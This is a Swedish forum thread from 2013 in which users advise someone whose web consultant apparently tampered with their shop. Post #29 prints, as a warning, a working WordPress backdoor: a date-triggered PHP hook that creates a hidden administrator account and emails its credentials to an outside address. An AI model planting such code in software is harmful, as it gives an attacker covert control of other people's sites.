FAQ |
Kalender |
2013-04-23, 00:29 | #21 | |||
|
||||
Mycket flitig postare
|
Citat:
|
|||
Svara med citat |
2013-04-23, 03:34 | #22 | ||
|
|||
Klarade millennium-buggen
|
Citat:
Jag vet inte hur ert avtal ser ut så jag kan inte säga exakt vad som ska ske, kanske du ska anmäla honom för stöld, eller dataintrång, vad vet jag. Allt beror på avtal, bolagsform, teckningsrätt och era handlingar mot varandra, det kan vara komplicerat. Jag tycker det är viktigt att alltid agera fullt legitimt och korrekt även om motparten inte gör det, om du ska ha framgång i en förhandling eller rättsprocess så måste du själv sköta dina kort enligt konstens alla regler, annars förstör du bara för dig själv. |
||
Svara med citat |
2013-04-23, 04:10 | #23 | |||
|
||||
Flitig postare
|
Citat:
|
|||
Svara med citat |
2013-04-23, 09:13 | #24 | |||
|
||||
Medlem
|
Går ju att tolka på olika vis. I mina ögon är de oerhört oprofessionellt och om jag var du skulle jag genast byta konsult till en annan.. Känns oerhört oseriöst!
|
|||
Svara med citat |
2013-04-23, 09:21 | #25 | ||
|
|||
Medlem
|
Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.
Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig. |
||
Svara med citat |
2013-04-23, 09:31 | #26 | ||
|
|||
Medlem
|
Jag skulle bryta direkt.
Dock för att han inte vet vad MYSQL update är |
||
Svara med citat |
2013-04-23, 09:54 | #27 | ||
|
|||
Har WN som tidsfördriv
|
Citat:
Bättre lägga energin på att få förändringen av hashfunktionen inbyggt i Wordpress direkt isf. |
||
Svara med citat |
2013-04-23, 10:05 | #28 | ||
|
|||
Medlem
|
Missade att detta rörde utveckling i Wordpress.
|
||
Svara med citat |
2013-04-23, 10:50 | #29 | |||
|
||||
Mycket flitig postare
|
När ni köper tid av paranoida WP-utvecklare finns det en metod som liknar vad som TS visade upp, att hålla koll på. Här är ett övertydligt exempel som väntar in att ett datum ska passeras. När datumet passeras skapas en adminanvändare automatiskt och ett mail går ut till "hackaren".
if ( strtotime( "2012-03-15" ) < time() ) { require_once( ABSPATH . WPINC . '/registration.php' ); if ( !username_exists( 'the-secret-backdoor' ) ) { add_action( 'shutdown', 'backdoor_create_new_admin' ); function backdoor_create_new_admin() { $user_id = wp_insert_user( array( 'user_login' => 'the-secret-backdoor', 'user_pass' => 'thesecretpassword1337haxxors', 'user_email' => '[email protected]', 'role' => 'administrator' ) ); wp_mail( '[email protected]', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: the-secret-backdoor | password: thesecretpassword1337haxxors' ); } } } Jag kan tänka mig att detta kan maskeras väl med massa includes.. |
|||
Svara med citat |
2013-04-23, 11:45 | #30 | ||
|
|||
Mycket flitig postare
|
Detta handlar inte om wp utan OpenCart!
Och i grunden handlar det mest om konsulter "får" göra såhär.. |
||
Svara med citat |
Svara |
|
|